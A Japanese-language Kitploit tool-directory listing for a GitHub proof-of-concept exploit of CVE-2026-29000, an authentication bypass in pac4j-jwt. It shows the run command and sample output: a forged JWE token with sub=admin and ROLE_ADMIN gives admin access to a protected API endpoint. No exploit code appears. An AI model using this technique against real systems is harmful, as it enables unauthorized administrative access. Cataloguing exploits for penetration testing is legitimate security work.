Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-29000---pac4j-jwt-Authentication-Bypass-PoC — CVE-2026-29000の概念実証エクスプロイト。pac4j-jwtにおける認証バイパスです。JWTトークンを偽造して、保護されたエンドポイントへの管理者アクセスを取得します。 | Kitploit
ツール/GitHubGitHub/manbahadurthapa1248/cve-2026-29000---pac4j-jwt-authentication-bypass-poc
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubmanbahadurthapa1248/cve-2026-29000---pac4j-jwt-authentication-bypass-poc

CVE-2026-29000---pac4j-jwt-Authentication-Bypass-PoC

CVE-2026-29000の概念実証エクスプロイト。pac4j-jwtにおける認証バイパスです。JWTトークンを偽造して、保護されたエンドポイントへの管理者アクセスを取得します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
15ヶ月前未レビュー

CVE-2026-29000 - pac4j-jwt 認証バイパス PoC

注記: これは私のオリジナルの作品ではありません。参考用としてここに保管しています。

動作方法:

root@kitploit:~
python3 exploit.py http://IP:PORT

[*] Fetching JWKS...
[+] Got RSA public key (kid: enc-key-1)
[*] Crafted PlainJWT with sub=admin, role=ROLE_ADMIN
[+] Forged JWE token created

[*] Accessing /api/dashboard...
[+] Status: 200
[+] Authenticated as: admin (ROLE_ADMIN)
[+] Token: eyJhbGciOiAiUlN_.....[Redacted].....D4zwSEY05lFkCB.J933HR-irY6a0r2uivRLZw
ツールをダウンロード